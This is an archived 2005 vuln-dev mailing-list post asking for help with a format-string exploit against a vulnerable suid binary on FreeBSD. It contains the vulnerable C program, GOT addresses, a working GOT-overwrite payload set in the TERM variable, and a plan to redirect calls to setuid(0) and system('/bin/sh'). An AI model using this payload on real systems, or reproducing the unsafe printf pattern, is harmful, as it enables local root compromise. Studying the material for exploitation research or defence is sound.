Format Strings nonexec heap/stack

From: Alex (alex00882007_at_gmail.com)
Date: 01/30/05

    Date: Sun, 30 Jan 2005 01:04:43 -0500
    To: vuln-dev@securityfocus.com

    Hello, this is my first post. I hope it's on the list.

    I am posting to get some help in developing an exploit for such a condition.

    The environment:
    FreeBSD machine, non-exec heap/stack. This is a suid binary, but is
    not calling setuid().

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
            char *ptr;
            ptr = getenv("TERM");
            if (ptr)
                printf(ptr);    /* user-controlled string used as the format */
            printf("\n");
            exit(0);
    }

    objdump -R | grep printf
    0804999c R_386_JUMP_SLOT printf
    objdump -R | grep exit
    080499b0 R_386_JUMP_SLOT exit

    (gdb) p setuid
    $1 = {<text variable, no debug info>} 0x280c1370 <setuid>
    (gdb) p system
    $2 = {<text variable, no debug info>} 0x28093a38 <system>

    Using a format string it is possible to over-write the GOT entries for
    printf() and exit().
    I have been able to do so successfully. The problem is that it is not
    enough to do just that, since it will become system("\n") or
    system(0);

    On FreeBSD, arguments are passed by pushing them onto the stack.
    What I have been trying to do is this.

    After rewriting the GOT entry for printf as that of setuid(), I want
    to push a NULL byte onto the stack to call setuid(0);
    The GOT entry for exit() has been replaced by that of system(). So
    instead of pushing 0x0, I want to push a pointer to a "/bin/sh"
    string.

    Is this possible even? Or is there a better way of doing this.

    To overwrite the GOT:
    export TERM=` printf \
    "\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
    %.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn

    where OFFSET = stackpop(?). Usually this is ~130, but it depends on how
    your environment variables are set up.

    I'm not sure what I would do next in order to change the values that
    are being pushed. Could someone help me with this?

